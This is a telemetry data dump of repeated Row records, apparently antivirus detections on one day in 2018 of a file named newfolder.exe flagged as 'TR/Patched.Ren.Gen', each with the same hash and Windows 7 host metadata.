  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:57Z'), dt=datetime.date(2018, 11, 2)),
